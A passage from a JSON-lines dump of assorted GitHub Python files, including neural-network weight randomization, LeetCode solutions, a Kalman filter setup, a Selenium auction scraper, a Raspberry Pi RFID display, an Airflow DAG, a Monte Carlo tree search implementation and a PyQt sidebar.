3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 2:\n for second_idx in range(0, 4):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 3:\n for second_idx in range(0, 6):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 4:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n\n elif self.model_type == \"resnet_152\":\n model_blocks = []\n for first_idx in range(1, 5):\n if first_idx == 1:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 2:\n for second_idx in range(0, 8):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 3:\n for second_idx in range(0, 36):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 4:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n\n elif self.model_type == \"lstm_softatt\":\n model_blocks = ['l0']\n\n elif self.model_type == \"bilstm3_att\":\n model_blocks = ['l0', 'l1', 'l2']\n\n elif self.model_type == \"bilstm6_att\":\n model_blocks = ['l0', 'l1', 'l2', 'l3', 'l4', 'l5']\n\n for element in model_blocks:\n self.important_layers[element] = {}\n\n for layer, param in self.base_model.named_parameters():\n if param.requires_grad:\n this_layer = layer.lower()\n for layer_idx in range(len(model_blocks)):\n if model_blocks[layer_idx] in this_layer:\n self.important_layers[model_blocks[layer_idx]][layer] = param\n\n def save_randomized_models(self):\n folder_idx = 1\n temp_dict = self.base_model.state_dict().copy()\n\n for block_key in tqdm(self.important_layers.keys(), desc=\"Randomizing each block of {}\".format(self.model_type)):\n\n for layer in self.important_layers[block_key].keys():\n random_weights_layer = torch.randn(size=self.important_layers[block_key][layer].size())\n temp_dict[layer] = random_weights_layer\n\n this_destination = os.path.join(self.destination_path, block_key)\n os.makedirs(this_destination, exist_ok=True)\n torch.save(temp_dict, os.path.join(this_destination, 'model.pth'))\n\n for layer in self.important_layers[block_key].keys():\n temp_dict[layer] = self.important_layers[block_key][layer]\n\n folder_idx += 1\n\n print(\"\\n\\n Process complete! 
Kindly find the models in the subfolders of {}\".format(self.destination_path))\n\n\nif __name__ == \"__main__\":\n\n param_random = ParameterRandomization(model_type=\"bilstm6_att\")","repo_name":"HarshineeSriram/Sensitivity_Tests","sub_path":"parameter_randomization/parameter_randomization.py","file_name":"parameter_randomization.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3851704048","text":"\"\"\"\nGiven a string s consists of upper/lower-case alphabets and empty space characters ' ',\nreturn the length of last word (last word means the last appearing word if we loop from left to right) in the string.\nIf the last word does not exist, return 0.\n\nExample 1:\n Input: \"Hello World\"\n Output: 5\n\"\"\"\n\n\nclass Solution:\n def lengthOfLastWord(self, s: str) -> int:\n s = s.strip()\n try:\n if ' ' in s:\n s = s.split(' ')\n return len(s[-1])\n else:\n return len(s)\n except:\n return 0\n# Runtime: 28 ms, faster than 60.70% (2020/03/18)\n# Memory Usage: 12.8 MB, less than 100.00% (2020/03/18)\n\n","repo_name":"okayell/LeetCode","sub_path":"Easy/58.Length_of_Last_Word.py","file_name":"58.Length_of_Last_Word.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37602491224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 21 14:40:38 2018\n\n@author: KunXunLee\n\"\"\"\nimport pandas as pd\n\n\ndef nsdata(st1,a,b):\n \n nst1=[]\n stdata=st1.iloc[0:,0]\n for index in range(len(stdata)):\n st1.loc[index]\n x_min=st1.min(axis=0)\n normalize=(st1.loc[index] - x_min) / (a - b)\n nst1.append(normalize)\n # 正規化訊號\n nst1=pd.DataFrame(nst1)\n \n \n return nst1\n \n \n \n \n \n \n ","repo_name":"IESSC/special-subject","sub_path":"2.藍芽智慧刀把/Python應變訊號分析上傳/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35832422799","text":"# Author: Ziyu Lu\n# Email: zl1546@nyu.edu\n# Date: July 2019\n# Description: This program defines the constant coefficients for the Kalman filter optimization problem\n\nimport math\nimport cmath\nimport numpy as np\n\n# constants\nm = 1 # mass of the object\nk = 0.5 # spring constant\ngamma = 0.1 # friction coefficient\nomega = k/m\nmu = gamma/m\nw = math.sqrt(omega - 0.25*mu**2)\nN = 4 # number of time steps in one simulation\ndt = 0.05 # step size in one simulation\nsigma = 0.1 # noise coefficient in SDE\nQ = 0.1 # observation noise variance\nX0 = np.array([[1.0],[0.0]]) # initial state (X = [x, v]^T)\nC = np.array([1.0, 0.0], ndmin=2) # observation matrix\n\n\nlambda1 = complex(-0.5*mu,w)\nlambda2 = complex(-0.5*mu,-w)\n\n# construct matrix A\nA11 = lambda2*cmath.exp(lambda1*dt) - lambda1*cmath.exp(lambda2*dt)\nA12 = -cmath.exp(lambda1*dt) + cmath.exp(lambda2*dt)\nA21 = lambda1*lambda2*(cmath.exp(lambda1*dt) - cmath.exp(lambda2*dt))\nA22 = -lambda1*cmath.exp(lambda1*dt) + lambda2*cmath.exp(lambda2*dt)\nA = np.array([[A11, A12], [A21, A22]])\nA = np.divide(A, lambda2-lambda1) # A turns out to be real\nA = A.real\n\n# print(A)\n\n# construct covariance matrix R\ne1 = cmath.exp(2*lambda1*dt)\ne2 = cmath.exp(2*lambda2*dt)\ne3 = cmath.exp((lambda1 + lambda2)*dt)\nR11 = 0.5*(e1-1)/lambda1 + 0.5*(e2-1)/lambda2 - 2*(e3-1)/(lambda1 + lambda2)\nR12 = 0.5*(e1-1) + 0.5*(e2-1) - (e3-1)\nR21 = R12\nR22 = lambda1*0.5*(e1-1) + 
lambda2*0.5*(e2-1) - 2*lambda1*lambda2*(e3-1)/(lambda1 + lambda2)\nR = np.array([[R11, R12], [R21, R22]])\nR = np.multiply(R, (sigma/(lambda2-lambda1))**2) # R turns out to be real\nR = R.real\n\n# print(R)\n","repo_name":"ziyulu-uw/sure-2019","sub_path":"sure/Ziyu_code/SGD_modularized/Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4343441516","text":"'''\nThis is from https://www.tutorialspoint.com/python/python_multithreading.htm\nCopy and pasted from the last block of code\n\nIf you remove the Queue lock on lines 29 - 35 you may complete things from the queue out of order\n'''\nfrom auction_scrape import get_auction_data\nfrom handle_page_timeout import handle_page_timeout\nfrom link_scrape import load_auction_links, update_auction_links\nfrom store_auction_data import store_auction_data\n# everything above is imported from project files\nfrom selenium import webdriver\nfrom msvcrt import getch # for detecting esc key press to end the program\nimport os # for grabbing the chrome_driver file path\nimport queue\nimport threading\nimport time\n\n\nexitFlag = 0 # don't forget this is a global var\nrelative_dir = os.getcwd()\nchromedriver_path = relative_dir + '\\chromedriver'\nqueueLock = threading.Lock()\nlink_q = queue.Queue()\nlink_driver = webdriver.Chrome(chromedriver_path)\n# visited links list was for testing only\nvisited_links = []\n\nclass myThread(threading.Thread):\n \n def __init__(self, tName, link_q):\n\n threading.Thread.__init__(self)\n self.tName = tName\n self.link_q = link_q\n \n def run(self):\n\n print(\"Starting \" + self.tName)\n open_auction(self.name, self.link_q)\n print(\"Exiting \" + self.tName)\n\ndef open_auction(threadName, link_q):\n \n while not exitFlag:\n print(\"Exit Flag is {}\".format(exitFlag))\n queueLock.acquire() # queueLock runs this synchronously for this code only\n if not link_q.empty():\n auction_link = link_q.get()\n visited_links.append(auction_link)\n print(\"Link_q Size : {}\".format(link_q.qsize()))\n if link_q.qsize() <= 10:\n print(\"---------- Adding new links into queue\")\n refill_link_q()\n queueLock.release()\n\n print(\"Thread {} will open link {}\".format(threadName, auction_link))\n # open driver and begin scraping\n auction_data = get_auction_data(auction_link)\n # store the auction data in the data base if there were no errors\n if auction_data is not None:\n store_auction_data(auction_data)\n else:\n queueLock.release()\n time.sleep(1)\n\ndef refill_link_q():\n global link_q\n handle_page_timeout(link_driver)\n link_q = update_auction_links(link_driver, link_q)\n\ndef run_scraper():\n global link_q # get initial link queue from global variable\n \n print(\"Initializing driver and loading voucher page\")\n link_driver.get(\"http://www.quibids.com/en/category-12-vouchers-and-limit-busters/\")\n\n print(\"Fetching initial auction links\")\n link_q = load_auction_links(link_driver, link_q)\n\n print(\"Number of links is : {}\".format(link_q.qsize()))\n\n threadList = [\"Thread-1\", \"Thread-2\", \"Thread-3\"]\n threads = []\n\n # Create new threads\n for tName in threadList:\n thread = myThread(tName, link_q)\n thread.start()\n threads.append(thread)\n\n # Press esc key to stop scraping and exit threads\n while True:\n key = ord(getch())\n if key == 27: # ESC key\n break\n\n print(\"ESC key pressed. 
Setting exit flag and closing threads\")\n\n # Notify threads it's time to exit\n global exitFlag # do this globally\n exitFlag = 1\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n print(\"Exiting Main Thread\")\n link_driver.quit()\n print(\"Visited Links:\")\n for link in visited_links:\n print(link)\n\nif __name__ == '__main__':\n run_scraper()\n","repo_name":"Chris-Draper/quibid-scraper","sub_path":"voucher_threading.py","file_name":"voucher_threading.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73381689042","text":"def nth_ugly_number(n):\n \"\"\"\n Return nth ugly number\n Explanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first\n 10 ugly numbers\n\n >>> nth_ugly_number(10)\n 12\n \"\"\"\n if n == 0:\n return 0\n i, j, k = 0, 0, 0\n numbers = [1]\n while len(numbers) < n:\n t1 = numbers[i] * 2\n t2 = numbers[j] * 3\n t3 = numbers[k] * 5\n min_those = min(t1, t2, t3)\n numbers.append(min_those)\n if min_those == t1:\n i += 1\n if min_those == t2:\n j += 1\n if min_those == t3:\n k += 1\n return numbers[n - 1]\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"erdenezul/leetcode","sub_path":"src/ugly_number2.py","file_name":"ugly_number2.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71639351442","text":"import argparse\nfrom NVE_lj import VV_mdlj\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--kt\",type=float,default=0.694,help='The temperature of the system.', required=False)\nparser.add_argument(\"--nstep\",type=int,default=1000,help='Total number of timesteps to run the simulation for.', required=False)\nparser.add_argument(\"--mode\",type=int,default=0,help='Initialization mode (see notes).' , required=False)\nparser.add_argument(\"--dt\",type=float,default=0.005,help='Size of timestep to use.' 
, required=False)\nargs = parser.parse_args()\n\nkt=args.kt\nnstep=args.nstep\nmode=args.mode\ndt=args.dt\nVV_mdlj(mode=mode,nstep=nstep,dt=dt,freq=10,kt=kt)\n","repo_name":"Taylor-96/PythonMDTutorial","sub_path":"nve-nvt_lennard-jones/NVE_main.py","file_name":"NVE_main.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15343914064","text":"import sys\nimport time\nfrom mfrc522 import SimpleMFRC522\nfrom RPi import GPIO\nimport smbus2\nfrom RPLCD.i2c import CharLCD\nimport threading\nsys.modules['smbus'] = smbus2\n\ndef run_time():\n    while True:\n        lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n        lcd.clear()\n        timeStamp = time.time()\n        timeArray = time.localtime(timeStamp)\n        lcd.cursor_pos = (0, 0)\n        t = time.strftime(\"%Y/%m/%d\", timeArray)\n        lcd.write_string(t)\n        lcd.cursor_pos = (1, 0)\n        t = time.strftime(\"%H:%M:%S\", timeArray)\n        lcd.write_string(t)\n        time.sleep(1)\n        lcd.clear()\n\nrt = threading.Thread(target=run_time)\nif __name__ == \"__main__\":\n    lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n    lcd.clear()\n    rt.start()\n    reader = SimpleMFRC522()\n    try:\n        while True:\n            card_id, card_text = reader.read()\n            lcd.clear()\n            lcd.cursor_pos = (0, 0)\n            t = time.strftime(str(card_id))\n            lcd.write_string(t)\n            lcd.cursor_pos = (1, 0)\n            t = time.strftime('welcome')\n            lcd.write_string(t)\n            time.sleep(1)\n    except KeyboardInterrupt:\n        print('bye')\n    finally:\n        GPIO.cleanup()\n        rt.join()\n","repo_name":"JianDa0127/GitHub_JianDa","sub_path":"RaspberryPi/lcd_card.py","file_name":"lcd_card.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053785425","text":"n = int(input())\n\n# When giving change, we should hand out as many 5-won coins as possible\n# 1. Decide whether the change can be given at all\n# 2. Decide how many 5-won coins can be used\n# I.e. find the minimum x+y satisfying n = 5*x + 2*y  ->  x should be as large as possible\n# Compute the maximum x first, then decrease it one by one while the equation fails;\n# if it still fails at the end, print -1\n\nsolution = 0\n# x is the quotient of n divided by 5, i.e. the initial maximum number of 5-won coins\nx = int(n//5)\n\n\nwhile True:\n\t# the maximum possible number of 2-won coins when using x 5-won coins\n\ty = (n-5*x) // 2\n\t# if the equation holds, take x+y and leave the loop\n\tif n == 5*x + 2*y:\n\t\tsolution = x+y\n\t\tbreak\n\t# and if it does not hold?\n\telse :\n\t\t# reduce the number of 5-won coins by one\n\t\tx -= 1\n\t# handle the case where change cannot be given:\n\t# x decreases one at a time, so if it fails even when x reaches 0, change is impossible\n\tif x < 0:\n\t\tsolution = -1\n\t\tbreak\n\nprint(solution)\n","repo_name":"Sangmin627/AlgoStudy2023","sub_path":"현준/백준/[그리디]_14916_거스름돈.py","file_name":"[그리디]_14916_거스름돈.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38845287204","text":"from airflow import DAG\nfrom airflow.operators import PythonOperator\nfrom datetime import datetime\n\ndefault_args = {\n    'owner': 'eyank',\n    'depends_on_past': False,\n    'start_date': datetime(2018, 1, 1),\n    'retries': 0\n}\n\ndag = DAG('python_hello_world_dag',\n          default_args=default_args,\n          catchup=False,\n          schedule_interval='00 20 * * *')\n\ndef hello():\n    return print('hello, world')\n\ndef sum_int():\n    return print(2+2)\n\n# def my_name():\n#     return print('i am Elena')\n\n# def sys_path():\n#     return print(pathlib.Path(__file__).parent.absolute())\n\nt1 = PythonOperator(\n    task_id='print_hello_world',\n    python_callable=hello,\n    dag=dag)\n\nt2 = PythonOperator(\n    task_id='sum_task',\n    python_callable=sum_int,\n    dag=dag)\nt1 >> t2\n","repo_name":"elenka-yank/lesson1","sub_path":"python_example_dag.py","file_name":"python_example_dag.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30324515990","text":"import functions\n\nfrom pathlib import Path\n\ndir = Path(__file__).parent.resolve()\n\nfilename = dir / \"input.txt\"\n\nSCORES = {\"X\": 1, \"Y\": 2, \"Z\": 3}\n\nWINS = [\"A Y\", \"B Z\", \"C X\"]\n\nDRAWS = [\n    \"A X\",\n    \"B Y\",\n    \"C Z\",\n]\n\nLOSS = [\"A Z\", \"B X\", \"C Y\"]\n\nCONVERTER = {\n    \"X\": {\"A\": \"Z\", \"B\": \"X\", \"C\": \"Y\", \"score\": 0},\n    \"Y\": {\"A\": \"X\", \"B\": \"Y\", \"C\": \"Z\", \"score\": 3},\n    \"Z\": {\"A\": \"Y\", \"B\": \"Z\", \"C\": \"X\", \"score\": 6},\n}\n\n\ndef task1():\n    _input = functions.read_file_to_list(filename, str)\n\n    answer = 0\n\n    for comp in _input:\n        [opp, me] = comp.split(\" \")\n\n        if comp in WINS:\n            answer += 6 + SCORES[me]\n        elif comp in DRAWS:\n            answer += 3 + SCORES[me]\n        elif comp in LOSS:\n            answer += SCORES[me]\n\n    print(\"\\tAnswer: \", answer)\n\n\ndef task2():\n    _input = functions.read_file_to_list(filename, str)\n\n    answer = 0\n\n    for comp in _input:\n        [opp, me] = comp.split(\" \")\n\n        conv = CONVERTER[me]\n        answer += conv[\"score\"] + SCORES[conv[opp]]\n\n    print(\"\\tAnswer: \", answer)\n\n\nif __name__ == \"__main__\":\n    print(\"========== Task 1 ==========\")\n    task1()\n    print(\"============================\\n\")\n\n    print(\"========== Task 2 ==========\")\n    task2()\n    print(\"============================\")\n","repo_name":"jonajo15/Advent-of-Code-22","sub_path":"src/days/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20471121229","text":"#%%\nimport networkx as nx\nimport numpy as np\nimport random\n\nclass MCTS():\n    def 
__init__(self, \n game,\n exploration_epsilon=0.25,\n biasedness=1,\n optimizing_player=1):\n\n self.game = game\n self.exploration_epsilon = exploration_epsilon\n self.exploration_coef = np.sqrt(2)\n self.biasedness = biasedness # determines how much the selection of nodes is biased towards strength. 0 is equality, 1 is proportional to strenght, >1 is superlinearly related.\n\n self.g = nx.DiGraph()\n self.nr_players = self.game.nr_players\n self.root = self.game.state_hash\n self.optimizing_player = optimizing_player\n\n self.g.add_node(node_for_adding=self.game.state_hash, \n rewards= np.zeros(self.nr_players),\n main_player_reward = 0,\n N=0, # number of roll-outs for this node\n terminal=False,\n leads_to_terminal=False, # unless there is only one state\n leaf=True,\n # uct=0, # not needed at the moment\n N_children=0,\n N_leads_to_terminal_child_edges=0,\n depth=0,\n parents=[],\n N_parents=0,\n current_player=int(self.game.state_hash[0]))\n \n def expand(self, node, return_random=True):\n # check whether node is terminal\n # undo leaf status of that node.\n current_depth = self.g.nodes[node]['depth']\n self.game.initialize_from_state(node)\n opts = self.game.options()\n children = 0\n # t = self.g.nodes[node]['N']\n leafs = []\n for child, action in opts.items():\n \n if child in self.g.nodes:\n # in this game cycles are forbidden. Check whether its a cycle or just multiple paths joining.\n \n # if its not a cycle, then add the edge, but not the node.\n # if it is a cycle, then add neither the edge nor the node.\n\n # check for cycles:\n condition, _ = self.exists_path(source=child,target=node)\n if condition:\n continue\n\n self.g.add_edge(u_of_edge=node,\n v_of_edge=child,\n leads_to_terminal=False,\n action=action)\n # increment the N_parents of the 'child' node.\n self.g.nodes[child]['parents'].append(node)\n self.g.nodes[child]['N_parents'] += 1\n\n # check whether the terminal conditions should be added.\n if self.g.nodes[child][\"leads_to_terminal\"]:\n self.g.edges[(node,child)][\"leads_to_terminal\"] = True\n self.g.nodes[node]['N_leads_to_terminal_child_edges'] += 1\n self.propagate_leads_to_terminal(node=node)\n else:\n # add first node and then edge\n self.g.add_node(node_for_adding=child,\n rewards=np.zeros(self.nr_players),\n main_player_reward = 0,\n N=0,\n # uct=self.calc_uct(w=0,N=0,t=t),\n terminal=False, # all nodes are initially terminal \n leads_to_terminal=False,\n N_children=0,\n N_leads_to_terminal_child_edges=0,\n leaf=True,\n depth=current_depth+1,\n parents=[node],\n N_parents=1,\n current_player=int(child[0]))\n self.g.add_edge(u_of_edge=node,\n v_of_edge=child,\n leads_to_terminal=False,\n action=action)\n leafs.append(child)\n # note that there might be elements in opts that do not get here.\n # so children is not just len(opts)\n children += 1\n \n self.g.nodes[node]['N_children']=children\n\n if children==0:\n self.g.nodes[node]['terminal']=True\n self.g.nodes[node]['leaf'] = True\n return None\n else:\n # it has children\n if len(leafs)>0:\n # and at least one leaf\n self.g.nodes[node]['leaf'] = False\n if return_random:\n return random.choice(leafs) \n else:\n return None\n else:\n # it has children but no leafs (all edges are going back to the tree itself)\n self.g.nodes[node]['leaf'] = False\n return None\n \n\n def select(self,node=None, return_path=[]):\n \"\"\" node must not be terminal.\n assumes a given tree.\n \"\"\"\n if not node:\n node = self.root\n return_path.append(node)\n if self.g.nodes[node][\"terminal\"]:\n return None, 
return_path\n if self.g.nodes[node][\"leaf\"]:\n return node, return_path\n next_nodes = [e[1] for e in self.g.out_edges(nbunch=node) if not self.g.edges[e][\"leads_to_terminal\"]]\n next_wghts = np.array([self.get_weight(reward=self.g.nodes[n]['rewards'][self.optimizing_player-1],\n N=self.g.nodes[n]['N'])\n for n in next_nodes])\n # np.array([self.g.nodes[n]['rewards'][self.optimizing_player-1]/self.g.nodes[n]['N'] + self.exploration_epsilon for n in next_nodes]) ** self.biasedness\n next_node = random.choices(next_nodes, weights=next_wghts, k=1)[0]\n return self.select(node=next_node, return_path=return_path)\n\n\n def rollout(self, edge, limit_no_actions=0):\n self.game.initialize_from_state(state_hash=edge[0])\n _, _, game_over, _ = self.game.step(action=self.g.edges[edge]['action'])\n if game_over:\n self.g.nodes[edge[1]]['terminal']=True\n self.g.edges[edge]['leads_to_terminal']=True\n self.g.nodes[edge[0]]['N_leads_to_terminal_child_edges'] += 1\n self.propagate_leads_to_terminal(node=edge[0])\n return np.array(tweeze_rewards(self.game.rewards))\n else:\n while not game_over:\n opts = self.game.options()\n chos = random.choice([o for o in opts])\n _, _, game_over, _ = self.game.step(action=opts[chos])\n return np.array(tweeze_rewards(self.game.rewards))\n \n\n def create_tree(self, max_iter=100, verbose=False):\n if verbose:\n for i in range(max_iter):\n if isinstance(verbose,int):\n node, rewards = self.iteration(verbose=False)\n if i % verbose == 0:\n print(i, node, rewards)\n else:\n node, rewards = self.iteration(verbose=verbose)\n print(i, node, rewards)\n else:\n for i in range(max_iter):\n node, rewards = self.iteration(verbose=False)\n\n\n def iteration(self, verbose=False):\n if verbose:\n print('select node')\n # try:\n leaf_node, path = self.select(return_path=[]) # selects any leaf node\n # except Exception as e:\n # print(e)\n # return self\n if not leaf_node:\n if verbose:\n print('leaf node is none??')\n return None, None\n if verbose:\n print('leaf node is ', leaf_node)\n # try:\n # Check whether leaf_node is terminal \n if len(path)>1:\n rewards = self.rollout(edge=(path[-2],leaf_node))\n self.backpropagate(return_path=path, rewards=rewards, including_multiple_paths=True)\n if self.g.nodes[leaf_node][\"terminal\"]:\n return leaf_node, rewards\n sel_node = self.expand(node=leaf_node, return_random=True) # expands the graph \n # except Exception as e:\n # print(e)\n # return self\n if not sel_node:\n if verbose:\n print('no node selected')\n return leaf_node, None\n else:\n if verbose:\n print('node selected')\n \n\n path.append(sel_node)\n if verbose:\n print(path)\n print('rollout')\n # try:\n rewards = self.rollout(edge=(leaf_node,sel_node))\n # except Exception as e:\n # print(e)\n # return self\n if verbose:\n print('backpropagate')\n try:\n self.backpropagate(return_path=path, rewards=rewards, including_multiple_paths=True)\n except Exception as e:\n print(e)\n return self\n if verbose:\n print('return')\n return sel_node, rewards\n \n\n def backpropagate(self, return_path, rewards, including_multiple_paths=False):\n if not including_multiple_paths:\n for node in reversed(return_path):\n # increment the reward to each node including the selected node\n new_rewards = np.add(self.g.nodes[node][\"rewards\"], rewards) \n self.g.nodes[node][\"rewards\"] = new_rewards\n self.g.nodes[node][\"main_player_reward\"] = new_rewards[self.optimizing_player-1]\n # increment the number of rollouts for that path.\n self.g.nodes[node][\"N\"] += 1\n else:\n node = return_path[-1] 
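# A hedged sketch of the idea implemented just below: when the search graph is
# a DAG rather than a tree (a node can have several parents), rollout rewards
# must be propagated along every parent chain, not only the selection path.
# Toy version using a plain parents dict; the names backprop_dag, parents,
# rewards and visits are illustrative, not from the class above.
def backprop_dag(node, reward, parents, rewards, visits):
    # accumulate the reward and visit count at this node ...
    rewards[node] = rewards.get(node, 0.0) + reward
    visits[node] = visits.get(node, 0) + 1
    # ... then recurse into every parent, so a shared ancestor is updated
    # once per incoming path that reaches it
    for p in parents.get(node, []):
        backprop_dag(p, reward, parents, rewards, visits)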
\n            self.backpropagate_multiple_paths(node=node,\n                                              rewards=rewards,\n                                              return_path=return_path,\n                                              on_path=len(return_path)-1)\n    \n\n    def backpropagate_multiple_paths(self, node, rewards, return_path, on_path):\n        new_rewards = np.add(self.g.nodes[node][\"rewards\"], rewards)\n        self.g.nodes[node][\"rewards\"] = new_rewards\n        self.g.nodes[node][\"main_player_reward\"] = new_rewards[self.optimizing_player - 1]\n        self.g.nodes[node][\"N\"] += 1\n        parents = self.g.nodes[node]['parents']\n        if len(parents) == 0 or on_path == 0:\n            return None\n        for parent in parents:\n            if on_path is None:\n                # node is not on the return path, but its parent might be\n                if parent not in return_path:\n                    # parent doesn't lie on the return path\n                    self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=None)\n                else:\n                    # parent lies on the return path\n                    # do not call backpropagate_multiple_paths here!!!\n                    pass\n            else:\n                index = on_path - 1\n                if parent == return_path[index]:\n                    # parent lies on the return path\n                    self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=index)\n                else:\n                    # parent doesn't lie on the return path\n                    self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=None)\n\n\n    def propagate_leads_to_terminal(self, node):\n        condition = self.g.nodes[node]['N_children'] == self.g.nodes[node]['N_leads_to_terminal_child_edges']\n        if condition:\n            self.g.nodes[node][\"leads_to_terminal\"] = True\n            for edge in self.g.in_edges(nbunch=node):\n                self.g.edges[edge][\"leads_to_terminal\"] = True\n                self.g.nodes[edge[0]]['N_leads_to_terminal_child_edges'] += 1\n                self.propagate_leads_to_terminal(node=edge[0])\n\n\n\n    def exists_path(self, source, target):\n        try:\n            path = nx.bidirectional_dijkstra(self.g, source, target)\n            return True, path\n        except nx.NetworkXException:\n            return False, []\n\n    def calc_uct(self, w, N, t):\n        return (w/(N+self.exploration_epsilon)) + self.exploration_coef * np.sqrt( np.log(t) / (N+self.exploration_epsilon))\n\n    def get_weight(self, reward, N):\n        pre_biased = self.exploration_epsilon\n        if N != 0:\n            pre_biased += reward / N\n        return pre_biased ** self.biasedness\n\ndef tweeze_rewards(rewards):\n    return [(r+1)/2 for r in rewards]\n\n\n    \n# %%\n","repo_name":"leomarlo/GameTreeAnalysis","sub_path":"rl/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3511400141","text":"\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\n\"\"\"Sidebar for plugins. 
The sidebar consists of actions.\nCurrently mode, connect and settings are defined.\n\"\"\"\n\n__author__ = \"Aviral Goel\"\n__credits__ = [\"Upi Lab\"]\n__license__ = \"GPL3\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Aviral Goel\"\n__email__ = \"goel.aviral@gmail.com\"\n__status__ = \"Development\"\n\n\nimport sys\nimport os\nimport SettingsDialog\nfrom PyQt4 import QtGui, Qt\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QPixmap\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QAction\n\n\n\nICON_DIRECTORY = \"icons\"\nHAND_ICON_FILENAME = \"hand.png\"\nCONNECTOR_ICON_FILENAME = \"straight_connector_with_filled_circles.png\"\nWRENCH_ICON_FILENAME = \"wrench.png\"\nDELETE_GRAPH_ICON_FILENAME = \"delete_graph.png\"\nADD_GRAPH_ICON_FILENAME = \"add_graph.png\"\nLIST_ICON_FILENAME = \"list.png\"\n\n\ndef create_action( parent\n                 , callback\n                 , text\n                 , checkable\n                 , checked\n                 , icon_path\n                 ):\n    pixmap = QPixmap(icon_path)\n    icon = QIcon(pixmap)\n    action = QAction(icon, text, parent)\n    # action.setIcon(icon)\n    # action.setIconText(text)\n    action.triggered.connect(callback)\n    action.setCheckable(checkable)\n    action.setChecked(checked)\n    return action\n\n\ndef mode_action( parent\n               , callback = (lambda event: print(\"Mode Clicked!\"))\n               , text = \"Mode\"\n               , checkable = True\n               , checked = True\n               , icon_path = os.path.join( ICON_DIRECTORY\n                                         , HAND_ICON_FILENAME\n                                         )\n               ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\ndef add_graph_action( parent\n                    , callback = (lambda event: print(\"Add Graph Clicked!\"))\n                    , text = \"Add Graph\"\n                    , checkable = False\n                    , checked = False\n                    , icon_path = os.path.join( ICON_DIRECTORY\n                                              , ADD_GRAPH_ICON_FILENAME\n                                              )\n                    ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\ndef delete_graph_action( parent\n                       , callback = (lambda event: print(\"Delete Graph Clicked!\"))\n                       , text = \"Delete Graph\"\n                       , checkable = False\n                       , checked = False\n                       , icon_path = os.path.join( ICON_DIRECTORY\n                                                 , DELETE_GRAPH_ICON_FILENAME\n                                                 )\n                       ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\ndef list_action( parent\n               , callback = (lambda event: print(\"List Clicked!\"))\n               , text = \"Show List\"\n               , checkable = False\n               , checked = False\n               , icon_path = os.path.join( ICON_DIRECTORY\n                                         , LIST_ICON_FILENAME\n                                         )\n               ):\n    return create_action( parent\n                        , callback\n                        , text\n                        , checkable\n                        , checked\n                        , icon_path\n                        )\n\ndef connector_action( parent\n                    , callback = (lambda event: print(\"Connector Clicked!\"))\n                    , text = \"Connector\"\n                    , checkable = True\n                    , checked = False\n                    , icon_path = os.path.join( ICON_DIRECTORY\n                                              , 